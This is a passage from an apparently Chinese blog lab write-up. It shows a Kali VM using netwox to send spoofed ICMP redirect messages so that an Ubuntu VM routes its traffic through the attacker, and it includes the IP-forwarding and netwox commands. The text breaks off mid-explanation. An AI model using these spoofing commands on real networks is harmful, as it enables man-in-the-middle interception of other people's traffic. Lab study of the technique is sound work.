ICMP重定向攻击实验:

本文详述了ICMP重定向攻击实验,通过Kali Linux攻击机对Ubuntu靶机进行中间人攻击,利用netwox工具发送ICMP重定向报文,改变靶机的流量转发路径。同时介绍了防御措施,包括禁用网关发送ICMP重定向报文和靶机拒绝接受ICMP重定向报文。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

ICMP重定向攻击实验:

0x01 攻击目的:

​ 使用攻击机对本网段内靶机进行ICMP重定向攻击。目的是诱使靶机认为攻击机是网关,将所有流量交给攻击机转发。攻击机即可实现中间人身份。

0x02 环境介绍:

​ 攻击机:Kali linux

​ 靶机:ubuntu 20.04

​ 存在形式:vmware之虚机

​ 联网方式:NAT

​ IP地址:

​ Gateway:192.168.8.2/24

​ Kali linux:192.168.8.128/24

​ Ubuntu20.04:192.168.8.130/24

0x03 攻击机和靶机的系统状态:

​ 攻击机开启IPv4转发功能:

​ root@kali:/proc/sys/net/ipv4# echo “1” > ip_forward
​ root@kali:/proc/sys/net/ipv4# cat ip_forward
​ 1

​ 靶机开启ICMP重定向报文接受:(默认机制就是接受)

​ francis@francis:~$ cat /proc/sys/net/ipv4/conf/all/accept_redirects
​ 1

0x04 攻击过程

​ 攻击机执行如下命令:

​ netwox 86 -d “eth0” -g “192.168.8.128” -i “192.168.8.2”

​ 注:netwox是一个常用报文伪装工具,其中86代表ICMP重定向报文伪装。以上命令具体语法解释如下:

​ -d “攻击出接

评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值